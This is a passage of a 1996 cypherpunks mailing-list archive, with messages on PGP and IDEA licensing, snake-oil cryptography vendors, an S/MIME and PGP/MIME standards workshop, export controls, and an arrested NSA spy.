ViaCrypt PGP shipped.  Users of ViaCrypt PGP have nothing to worry 
about.  Personal users of MIT PGP in the US also have nothing to worry 
about because Ascom's published position deals with 'commercial use'. The 
only people who need to do anything are people overseas using PGP 2.6i or 
2.6ui in their businesses.  They need to license IDEA from Ascom."

------------------------------------------------------------------------- 
|So, I went walking through the street.   |Mark Aldrich                 | 
|I saw you strung up in a tree.           |GRCI INFOSEC Engineering     | 
|A woman knelt there, said to me,         |maldrich@grci.com            | 
|Hold your tongue, man, hold your tongue. |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 24 Feb 1996 10:02:42 +0800
To: cypherpunks@toad.com
Subject: Cluelessness V.S. Lack of Knowledge
Message-ID: <2.2.32.19960223212901.00899578@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In the snake oil controversy, I see a couple of issues...

There are some people/companies out there who have the attitude
that they have some sort of "remarkable achievement in the
field of cryptography".  In fact, it is SO remarkable that they
do not have to submit to any sort of peer review or examination
by people with more skill in the field than themselves.  Some
of this can be explained by being too close to the problem to
see any of the flaws.  Most of it can be attributed to ego.
These people are pretty much hopeless.  They can be a great
source of entertainment and/or flame fest practice, but rarely
do they ever learn by their mistakes.  Their ego gets in the
way far to often.  (IPG Sales (any relation to "Soupy"?) is a
prime example of this.)

There are companies out there that are trying to build good
products.  These people can be instructed on the ways of
implementing good crypto.  Unfortunately, I have seen a number
of them pushed up against the "Wall of Attitude" when they do
ask for help.  Cypherpunks, for good or for bad, have a
reputation for being experts in the field.  People come here to
ask questions because "Cypherpunks know what Good Crypto tastes
like".  What is happening though is that they are also getting
a reputation as people who flame first and give answers later,
if ever.  This is not a "good thing".  If you want strong
crypto to exist, you have to make the people who are trying to
put it into place able to understand what it is in the first
place.  Giving them grief when they try to find out the flaws
in the ideas (and are willing to learn) is not helpful to the
community as a whole.

I know of one developer who is trying to implement a strong
cryptosystem in his app.  He is unwilling to post his
questions/concerns here because he is afraid of getting his ass
shot off on the first query.  Judging by some of the responses
I have seen, I do not blame him!  I can understand intolerance
of the sales droids who push crap.  I do not have much
tolerance for them either.  It bothers me when I see people who
are not experts in the field AND ARE TRYING TO LEARN getting
"blowed up real good" because they are not experts.

Cypherpunks not only need to teach, they need to be willing to
teach.
 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMS4xFOQCP3v30CeZAQEUlwf/SpOqOAnhk/8jZcQrH0IgDHtMgyUtjdIh
b3URbqcIpfff6qQm8dT8/bbmEsGxavoYKC8xO6H5fiLtw2TRqaFYLsQX+JyYBurd
lW7k+llMtGqRdthOPBjhVthTEnncVMhqqlT4E0axhhZMWPYNvW3h+NRjiDJSBFEl
CFXe1MgiYt3wMlwJLu7Xqwem1zDT4Jmx3h2mx4ULeyvbKyM1ZkZZPe6vBuTgrgBN
DaVw8204nc5vIO1LjTr2eY2zfwQToEVOlXlg3IgXtzmTz0eA0mFGoG/klapWKXcQ
PSGFrWBhf0fmA488z2DlboiA6Q/HaxAQ4SR9sZ05CUKT1CKgGYX+Lg==
=FY3m
-----END PGP SIGNATURE-----
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 24 Feb 1996 06:55:01 +0800
To: jeffb@sware.com
Subject: Re: REM_ote
Message-ID: <199602231840.NAA21651@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Oops, Jeff, for the fun mirror; gotta watch these pseudo-random 
walks, what with all the Net security deals favorably affecting 
more and more c'punks.


BTW, the full REM_ote package includes articles by The Wash 
Post and Fin Times, each of which have slightly different 
descriptions of your clearly respected, and valuable!, company.


And another BTW, I hope you got a respectable slice of the 
buyout pie. If so, keep in mind as you consider where to 
dispose of your new hard-earned wealth that I design extra 
virgin fancy houses to camouflage impenetrable, and not-at-all 
cheesy, Swiss vaults.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Thompson <eric@freestyle.com>
Date: Sat, 24 Feb 1996 10:06:25 +0800
To: cypherpunks@toad.com
Subject: Re: NSA agent arrested
Message-ID: <199602232143.NAA10488@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


> I just heard a very short blurb on CBC radio about a KGB mole within the NSA
> from the 60's (?) getting arrested by the FBI. Pretty much no details 
> were given. Any info?

See  http://www.cnn.com/US/9602/spy_charges/index.html

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Sat, 24 Feb 1996 06:33:23 +0800
To: jya@pipeline.com (John Young)
Subject: Re: REM_ote
In-Reply-To: <199602231751.MAA16891@pipe3.nyc.pipeline.com>
Message-ID: <199602231850.NAA05083@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
> 
>    2-23-96. WSJ:
> 
>    "H-P Acquires Most of Internet Security Firm."
> 
>       SecureWare technology is used by the Pentagon to
>       safeguard transmission of military secrets. The firm's
>       team of about 40 programmers is "a substantial fraction 
>       of the hired guns available in the on-line security 
>       world" who snake oil an extra virgin security that not 
>       even hackers can cross. Hackers would question that; 
>       they have a remarkable history of eventually figuring 
>       out ways to get past advances in faked chastity.

For the record, this includes me (Yes, I work for HP now).  Please
note that most of the story content is, if not wrong, at least poorly
stated -- so what else is new?  Also, the specific quotes there --
including the "hired gun" quote above -- are from an "industry analyst"
not from anyone at either HP or SecureWare.


-- Jeff (Hired gun?  I guess so.  But who isn't?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sat, 24 Feb 1996 08:25:21 +0800
To: cypherpunks@toad.com
Subject: Re: NSA agent arrested
In-Reply-To: <199602231851.MAA07830@softserv.tcst.com>
Message-ID: <Pine.A32.3.91.960223143800.65870A-100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 23 Feb 1996, Mike Tighe wrote:

> Yeah, I got his name but was not sure of the spelling. Robert Steven
> something. Lives in Millersville, PA. I think he is retired. Looks like a
> victim of the cozying relationship between the FBI and the KGB-whatever
> they call themselves nowadays.

Robert Stephan Lipka. I got a note (thanks) pointing me to an article in 
the Stateside News section at the Nando Times <http://www.nando.net> . The 
article's got better background than others I've ran into so far today.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Feb 1996 12:23:31 +0800
To: s1018954@aix2.uottawa.ca
Subject: Re: NSA agent arrested
Message-ID: <ad536f822802100418ae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 2/23/96, Mike Tighe wrote:

>Yeah, I got his name but was not sure of the spelling. Robert Steven
>something. Lives in Millersville, PA. I think he is retired. Looks like a
>victim of the cozying relationship between the FBI and the KGB-whatever
>they call themselves nowadays.

Lipka. Details are in the usual news sources, such as Reuters
(http://www.excite.com/Bulletin/), under Net Directory in Netscape.

No CP relevance that I can see, except that Lipka didn't use remailers to
protect his identity when he tried to reestablish contact with the Soviets
()who were actually FBI).

Lipka was a low-level 20-year-old when he worked for the Army, probably
assigned to the Army Security Agency (considered part of the NSA).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 25 Feb 1996 10:29:12 +0800
To: cypherpunks@toad.com
Subject: French regulations on crypto
Message-ID: <9602231951.AA09523@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody have a list of crypto software/algorithms
 that are forbidden for use without GKE in france?   

More specifically, I would like to know about the 
algorithms used in :
 - PGP (IDEA, RSA, etc.)
 - blowfish
 - 3DES

What I am really after is *precise* information, 
with references to official govt documents if possible,
about the restrictions on thoses algorithms and/or
key size limits (if applicable).


Thanks.

JFA
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Deacon <alex@verisign.com>
Date: Sun, 25 Feb 1996 03:26:28 +0800
To: Raph Levien <raph@c2.org>
Subject: IA5 String...
In-Reply-To: <199602230055.QAA15846@infinity.c2.org>
Message-ID: <312E44ED.5EAF@verisign.com>
MIME-Version: 1.0
Content-Type: text/plain


>    There was a lot of energy around S/MIME. People are implementing
> it. Internally, it's pretty kludgely, but it does provide pretty good
> cryptographic services. (as an aside, my favorite kludge anecdote is
> the fact that X.509 certificates use an IA5 character set rather than
> ASCII, so that the @ in email addresses has to be represented as (a)
> instead).

Wow, is this true?  I dont think so.  The CCITT document I have (CCITT
T.50) mentions that an @ sign (Commercial at) is a member of the IRV.
>From what I understand IA5 basically means US ASCII.  

Alex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sat, 24 Feb 1996 10:42:23 +0800
To: Brad Knowles <brad@his.com>
Subject: Re: Conference report - resolving security workshop
In-Reply-To: <v01540a15ad5338323efb@brad.his.com>
Message-ID: <Pine.SUN.3.91.960223140644.26994A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


(Note: subject line restored - it got chopped because I misspelled it 
as "subect" and used raw sendmail. Also, the original text, with small 
corrections, is available at http://www.c2.org/~raph/report.html)

On Fri, 23 Feb 1996, Brad Knowles wrote:

> At 4:55 PM 2/22/96, Raph Levien wrote:
> >    The biggest problem with S/MIME is that the signed and encrypted
> > format reveals who made the signatures. Obviously, this has severe
> > consequences for anonymous mail. Believe it or not, a lot of people
> > care.
> 
>     IMO, this has to be fixed as well.  The good thing is that
> the folks who have an investment in S/MIME seem to be willing to
> make changes to the specification to suit the desires of the
> larger secure Internet email connunity at large.  I hope that
> companies like VeriSign (that help other comapnies to implement
> this kind of technology) also agree to follow suit.

   This can be fixed as easily as allowing the protected MIME part to be
an S/MIME signed message. The S/MIME spec will need to recommend that
mailers deal gracefully with this case; if not, there will be user
interface disasters. I'd recommend that mail readers treat recursive
encrypted and signed S/MIME messages identically to non-recursive (i.e. 
PKCS #7 native). Even better would be for the RSA's S/MIME toolkit to be 
able to perform the translation automatically.

   I agree with Brad that it needs to be fixed. If a large installed base 
of S/MIME clients gets deployed that cannot handle the S/MIME format 
hiding the signatory, then we will have failed in an important way.

> >    One strength of PGP has traditionally been its unity. PGP means one
> > message format (the PGP one), one suite of crypto algorithms (the PGP
> > one), one key format (the PGP one), one application (PGP itself). Most
> > of the other proposals are modular in some way, especially with
> > respect to algorithms. PGP is moving in that direction.
> 
>     IMO, unity in this case is both a benefit and a deficit.
> Because it has not historically been separable, it's either all
> or none of PGP, and that's not an implementory style that's
> likely to win friends or marketshare.  To that degree, I think
> PGP has probably been less successful than it could have been.
> To the degree that this is changing is one indicator of its
> potential to continue to be a player.

   Agreed. The changes to PGP could be good, bad, or some combination. My 
real point is that whatever the reasons have been for PGP's success or 
failure, they won't resemble much the reasons why PGP will succeed or 
fail in the future.

> >    Earlier, I mentioned that two and a half protocols survived the
> > day. The remaining one is MSP. It's actually not a bad protocol. It
> > has two features that none of the others have: the ability to label
> > classified messages, and a cryptographically strong signed receipt.
> > Both of these functions are highly important for government users. It
> > looks like government suppliers are going to go ahead and implement
> > it, and the government is going to use it.
> 
>     Although these benefits are present in the current MSP, I
> don't see anything inherent in MSP that makes it necessarily
> superior in these areas.  If you were doing normal MIME-type
> receipts (whatever that means, since I think there are three
> different drafts under way currently), and you simply added the
> ability to cryptographically sign a timestamp in the "proper"
> MIME receipt type, then MSP would lose this advantage.
> 
>     I think labeling could potentially be done by follow-on
> versions of other packages as well, since I think we all agree
> that generic labeling which can be used both for standard
> gov't-style classification levels and compartments, as well as
> for business-style sensitivity labeling.  In fact, I'd almost be
> inclined to say that it would likely be as easy (or easier) to
> create a new general-purpose labeling system for use with any of
> the competitors than it would be to modify MSP to support
> business-style labels in addition to the gov't-style labels I'm
> sure it has today (maybe it already has labels, but I don't
> think that this is that tough of a problem to solve in any
> event).

   One of the action items from the conference was for the contenders to
converge on any pieces that were not gratuitously different. For S/MIME
and PGP/MIME to simply adopt receipt and labelling standards, even to lift
them wholesale from MSP, would be well in accordance with this goal, I
think. 

>     This is where I say that what we need to do is neither cave
> in to the limitation imposed by the gov't nor do we accept that
> we have to rip out encryption from our products to be shipped
> overseas or used in the U.S. on the behalf of overseas
> customers.  We need to (on a daily basis) wipe the gov't nose in
> this mess that they've created, until such time as they learn
> that it stinks and that they shouldn't do that indoors anymore.
> 
>     ITAR be damned.

   Hear, hear. My point is that it isn't just cypherpunk advocacy of
strong crypto. Any company that ships a 40-bit product is going to get
badly burned by well publicized breaks. Their customers are going to feel
betrayed. They thought they were buying a "secure" solution, but they
weren't.
   Perhaps this is putting it a bit strongly, but using the word "secure" 
in conjunction with a 40-bit produce borders on fraud. Perhaps it makes 
more business sense to defend against the ITAR on First Amendment grounds 
than to defend against fraud charges on ITAR grounds. If not a lawsuit, 
then a disillusioned customer base, which is just as bad.

> >    If care about offering crypto in the non-US market, form a
> > partnership with overseas developers to add the crypto.
> >
> >    Non-US developers, now is a fabulous opportunity. Get those
> > implementations underway, the sooner the better.
> 
>     And own the crown jewels to every single company in the U.S.
> all that much faster.  It's not like the NSA is help to protect
> them from espionage that originates from competitors or from
> what used to be the political espionage organizations that are
> now fighting to keep their jobs.  It's not like companies will
> have a single moments interest in having to deal with two
> different standards for their U.S. customers and overseas
> customers, or worse, their U.S. subsidiaries and their overseas
> subsidiaries.
> 
> 
>     Everybody should buy their encryption technology from a
> country where this kind of thing isn't under export control, and
> then ship (or operate) from that country.  When all the
> companies have moved overseas somewhere (or at least moved the
> official bits that they have to move in order to make this
> happen), maybe the U.S. gov't will wake up.  But of course, by
> then it will be too late.  And the NSA (and other governmental
> entities) will have succeeded in doing "Very Grave Harm to
> National Security Interests" because there won't be much of a
> Nation left behind when all the companies (and therefore
> workers) are overseas.
> 
> 
> 
>     Sorry, this has been a *major* sore point with me for years.
> 
> >    Most serious email vendors plan to "implement everything that's
> > real." That means S/MIME for sure, PGP/MIME assuming they can get
> > their hands on a decent implementation, and MSP if they sell a lot of
> > stuff to the government.
> 
>     I'm hoping that we'll be able to significantly reduce the
> playing field of "what's real".

   I think we just did. The only other way for the field to reduce any
more is for PGP to tank (unlikely), for RSA to drop S/MIME (unlikely) or
for MSP to disappear (won't happen entirely - witness X.400). 

> >                                              Over the next few months,
> > we will see some very high profile, mass market implementations.
> 
>     You may see them from others, but I don't think you're
> likely to see them from us anytime soon.  See my comments above
> about ITAR.  We're a world-wide company (and trying to become
> even moreso) with world-wide customers.  Hell, we could even get
> completely cut off from certain countries because they deem that
> we're providing access to "illegal" or "unapproved" encryption
> technologies.

   I was speaking about others ;-). A lot of people have announced that 
they're going to implement S/MIME. The remaining question is whether 
they're really going to do so. Without sticking out my neck and naming 
individual companies, the impression I got is that they are.

> >    At the end of the meeting, Dave asked the room for consensus on
> > several points. First, there was strong consensus that the encryption
> > protocols converge on multipart/security for their signed message
> > format.
> 
>     You mean "multipart/signed", right?

   Yes.

>     There was also strong support for changing the
> "octet-stream" definition of "multipart/encrypted" to something
> more meaningful (hopefully simply state that it's one of the
> standard MIME types, and can presumably be safely converted to
> and from things like base64 or quoted-printable, or that its
> canonical form is one of the seven-bit safe formats).  With that
> change, there was strong support that I heard voiced for
> supporting "multipart/encrypted" as well.

   There was support, but was there consensus? My brain is just too fuzzy 
to remember.

> >    I'd say that's quite a remarkable achievement for a such a
> > difficult area.
> 
>     Agreed.  I think Dave Crocker deserves a lot of credit for
> how well he managed to shepard us "cats" and that he didn't let
> things get far enough off-track that we turned into "hostile
> cats".

   Absolutely.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Wohler <wohler@uluru.worldtalk.com>
Date: Sun, 25 Feb 1996 03:24:42 +0800
To: Alex Deacon <alex@verisign.com>
Subject: Re: IA5 String...
In-Reply-To: <199602230055.QAA15846@infinity.c2.org>
Message-ID: <199602232310.AA100577031@worldtlk.worldtalk.com>
MIME-Version: 1.0
Content-Type: text/plain


  Shoot, I should have caught that in the meeting.  It isn't "@"
  that's missing from IA5, it's "$".

Bill Wohler <wohler@newt.com>   ph: +1-415-854-1857  fax: +1-415-854-3195
Say it with MIME.  Maintainer of comp.mail.mh and news.software.nn FAQs.
If you're passed on the right, you're in the wrong lane.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sat, 24 Feb 1996 11:08:21 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199602212358.SAA25640@pipe10.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.960223154214.2053B-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



From: Parveez Syed
Global Media Monitoring
Shanti Communications
One Stuart Road, Thornton Heath, Surrey CR7 8RA1 UK
Tel: London-UK 44-0831-196693
Fax: 44-0181-665 0384
E-Mail INTERNET: PARVEEZ@CR78RA1UK.WIN-UK.NET

Building big brothers
book reviewed by Parveez Syed (c) Shanti RTV

   Building in Big Brother:
   The Cryptographic Policy Debate
   Edited by Lance J. Hoffman
   Springer Verlag Publishers
   Copyright: March 1995
   Price:$29.95
   ISBN 0-387-94441-9
   
"If you ever wondered how a particular computer technology could
attract the interest of the directors of three intelligence
agencies, the heavyweights in the computer industry, a gang of
programmers turned freedom fighters, and the President of the
United States, you need look no farther than Building in Big
Brother. This book outlines the next civil liberties battle in
the United States," according to Marc Rotenberg of Electronic
Privacy Information Center.
   
"One-stop-shopping for even the most sophisticated analyst of the
policy wars over cryptography," according to Michael Froomkin,
Associate Professor of Law, University of Miami Law School

"Lance Hoffman has compiled an extraordinarily useful and well
balanced collection of materials on cryptography and its 
applications. This book will instantly become a definitive 
compendium," Peter Neumann said.
   
"Though Lance Hoffman is a dedicated opponent of current 
government policy, he has assembled a volume that should be -- 
and will be -- on the desk of every cryptographic policymaker 
in Washington. He has accurately recorded the many voices in a 
debate that will profoundly affect our future, for good or ill, 
well into the twenty-first century. This book is an important 
contribution to the history of encryption. It is an even more 
important contribution to those who are struggling to shape 
that history," Stewart Baker, Steptoe & Johnson (formerly General
Counsel to the National Security Agency) added.

"An authoritative source of political writings by the major 
players in the crypto revolution," according to Philip
Zimmermann, Creator of PGP.

ends
Presented by: Shanti RTV (c) 23 Feb 1996.


-----------------------------------------------------------------
Parveez Syed's direct contact details are:
One Stuart Road, Thornton Heath, Surrey CR7 8RA1 UK
Tel: London-UK 44-0831-196693;
Fax/tel: 44-0181-665 0384 
E-Mail INTERNET: parveez@cr78ra1uk.win-uk.net 
-----------------------------------------------------------------
Food for thought?: "In politics, as in the snake oil business, it 
pays to have a short memory and a chameleon-like quality. That is 
why the relationship between a journalist and a politician should 
be like the one between a dog and a lamp-post".
But who is doing what to whom? One wonders ;-)
----------------------------------------------------------------- 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sat, 24 Feb 1996 12:22:10 +0800
To: dlv@bwalk.dm.com
Subject: Chain Letter to Congress, TOO!
Message-ID: <2.2.16.19960223214644.359711a6@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


They oughta send it to the congress servers
while they are at it.

Liked the mailto: tag on the mail
Netscrape and Eudora support it.

Love Always,

Carol Anne
-----BEGIN PGP SIGNED MESSAGE-----

This is my public PGP key.
Signed and certified!

Love Always,

Carol Anne

 
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy/ZOrAAAAEEANDo2ZIACDkf8irWB0Pi8UhcBts8hlhPguUputkwXfabtqpo
PziaSrj0/qpd+SfjjKyjC4l0TPfc8wrEHbGfNdwbMCmugBgVfaw8SBZnV7J0NxYC
GWt819ZZHhgM5+b+MjjY7DftHv6WDuo5ag0aMBW3FuDyDvaVRIrpjEWs1wBlAAUT
tBxjYWI4IDxjYXJvbGFubkBjZW5zb3JlZC5vcmc+
=8ToJ
- -----END PGP PUBLIC KEY BLOCK-----




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Uncensored from heavily.censored.org

iQCVAwUBMSmN0YrpjEWs1wBlAQFLTAQAjt6NhN0GFNNLUhkVaho6pcUi+VKP1Kw8
8m7Wwyhk4baS25m2wumyeoCxIKQz2nP6pT2EwbNJXmig+g/CeMxuqlInGmSBKeuZ
evpGgc8q5rZVdnLW2q8dCyoe/uALcPa1K9WpBB030Mka8Gq/9Lc8Y7WtJ09Cnwrw
w7YE0N/X594=
=5puG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 24 Feb 1996 10:24:33 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 22 February 1996
Message-ID: <01I1K6VFSPEYAKTLYD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 23-FEB-1996 00:27:10.72

***************************************************************** 
Edupage, 22 February 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom, a
Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

	This is the first I've heard (I think) that theirs will allow
electronic cash. Wonder what exactly this means? 

>ELECTRONIC WALLET FROM ORACLE AND VERIFONE
>Oracle, which specializes in database software, and Verifone, which
>specializes in credit card verification systems, have formed an alliance
>that will allow customers using "electronic wallets" built into Internet
>browser software to access a full range of financial transaction methods,
>including credit and debit cards, smart cards and electronic cash.  The
>companies call it an "end-to-end" system for secure electronic commerce on
>the Internet.  (Financial Times 22 Feb 96 p16)

	Somehow, the cluelessness of governments sometimes amazes even me. Have
they ever heard of companies moving?  

>TAX REVOLT ON THE INFO HIGHWAY
>When officials in Spokane, Wash. thought they could wring some extra revenue
>via a 6% tax on Internet providers, they were inundated with e-mail and
>phone calls protesting the action.  One firm even set up a Web site for
>users to vent their opposition.  The result was the city council decided to
>delay the tax pending further study, but the Spokane experience is likely to
>be played out in cities across the country as local governments look for new
>sources of cash.  (Information Week 12 Feb 96 p10)

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>Technical support is provided by the Office of Information Technology,
>University of North Carolina at Chapel Hill.

>***************************************************************
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage: send
>a message to: listproc@educom.unc.edu and in the body of the message type:
>subscribe edupage George Bernard Shaw (assuming that your name is George
>Bernard Shaw;  if it's not, substitute your own name).  ...  To cancel, send
>a message to: listproc@educom.unc.edu and in the body of the message type:
>unsubscribe edupage.   (Subscription problems?  Send mail to
>educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sun, 25 Feb 1996 03:26:23 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Internet Protest!
In-Reply-To: <9602231413.AA17645@alpha>
Message-ID: <199602240131.RAA04410@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


But if the sysadmin at the white house gets so busy and has to charge
overtime, then it comes to the boss's attention and then the boss 
would know what is up. The boss would not see the individual email
messages, but he would get the gist.

I happen to be a sysadmin for a zillion servers and groups
of machines on a big huge corporate 
network. I have had to deal with full email buffers. When I spend
overtime fixing them, Gordon, my manager demands to know why. I will
honestly tell him what is happening. If it was because of a protest, 
I would tell him. Knowing him, he would probably want to look at
a sample of the emails.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 24 Feb 1996 10:55:01 +0800
To: cypherpunks@toad.com
Subject: Re: REM_ote
In-Reply-To: <199602231751.MAA16891@pipe3.nyc.pipeline.com>
Message-ID: <199602232332.RAA00171@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Marianne Mueller, Java security engineer, also said the chances of such
> hacking occurring are "remote."

This is the sort of bullshit that gets companies in trouble.  Netscape has
a good record of responding to and fixing security problems.  Why should
they feel the need to do spin control?  This borders on lying.

If the hole is there, hackers will distribute toolkits that will let even
comparitively unskilled people exploit it.  Here in Chicago, there is a
group of hackers that teaches organized classes on how to break into
systems, and they give their students toolkits.

Anything you can do with a computer can be automated.  If there's a 
difficult way to hack into a machine, someone can put it in a box that 
makes it easy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sun, 25 Feb 1996 03:26:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Expect A Wave of Killings of Journalists....
In-Reply-To: <ad529b3325021004378f@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.960223190113.25263A@mixolydian.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   The CIA has allways  had journalists in their employ and big time. It 
will not matter an iota if the government allows it or not ,it will be 
done.They are not the only government to use reporters or actors or even 
world reknown chefs. 
                           moroni









On Thu, 22 Feb 1996, Timothy C. May wrote:

> At 11:36 PM 2/22/96, John Young wrote:
> >   2-22-96. TWP:
> >
> >   "CIA Can Waive Prohibition Against Using U.S. Clergy Abroad
> >   for Covert Work."
> >
> >      A controversial loophole permitting the CIA to recruit
> >      American journalists as agents also allows the agency to
> >      waive a similar 19-year-old ban on employing clerics or
> >      missionaries. An official also disclosed that CIA
> >      regulations prohibit recruiting employees of members of
> >      Congress or congressional committees "without the
> >      approval of the member" for whom they work.
> 
> I watched CIA Director John Deutch (or is it Deutsch?) explain today just
> how the rules are being relaxed on having journalists as CIA operatives,
> and I could practically hear a collective "Oh, Shit!" echo from the
> journalistic capitals of the Second and Third Worlds.
> 
> Even when journalists were reporting to the intelligence agencies, they
> like the convenient fiction that such practices were forbidden. Even so, a
> couple of journalists were tagged by the governments they were spying on
> and disposed of.
> 
> Expect this to increase. Except now it will likely be Russian Mafiosos
> garrotting the "Washington Post" economics reporter in the back alleys off
> the Arbat.
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Sun, 25 Feb 1996 03:27:33 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602230622.BAA11095@UNiX.asb.com>
Message-ID: <Pine.BSD/.3.91.960223182512.28899C@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Thank you very much for your suggestion. I do not know if you have 
noticed or not,  but we have already done that, with the exception of 
private mail to a very few unspecified individuals, and this letter alone 
among all of the dozens of C'punk and other letters, we have suspended 
replying to the attacks. Please also note, that other than to four 
selected cypher lists, generic, we have made no postings to usenet, or 
listserve groups. We are eager for your cooperation, but there are problems
with complying to some of your requests. Give us a chance to explain that to a 
few of your people, and we will get back with you. Also, please read my 
revised response below,

I believe that the first priority is establish the strength, or lack 
thereof, of the algorithms, Everything else is irrelevant unless that 
can be established one way or the other. Accordingly, I am taking 
the necessary to initiate that effort. Please be patient, for a few days.


Appreciatively yours,


Ralph,   

That applies to even you Perry - the appreciative part that is

On Fri, 23 Feb 1996, Deranged Mutant wrote:

> IPG Sales <ipgsales@cyberstation.net> wrote:
> 
> Suggestion: wait a week until the flames on the c'punks list die 
> down. Have the techie folks there read all of them, think about them, 
> and come up with a coherent and well written reply that addresses all 
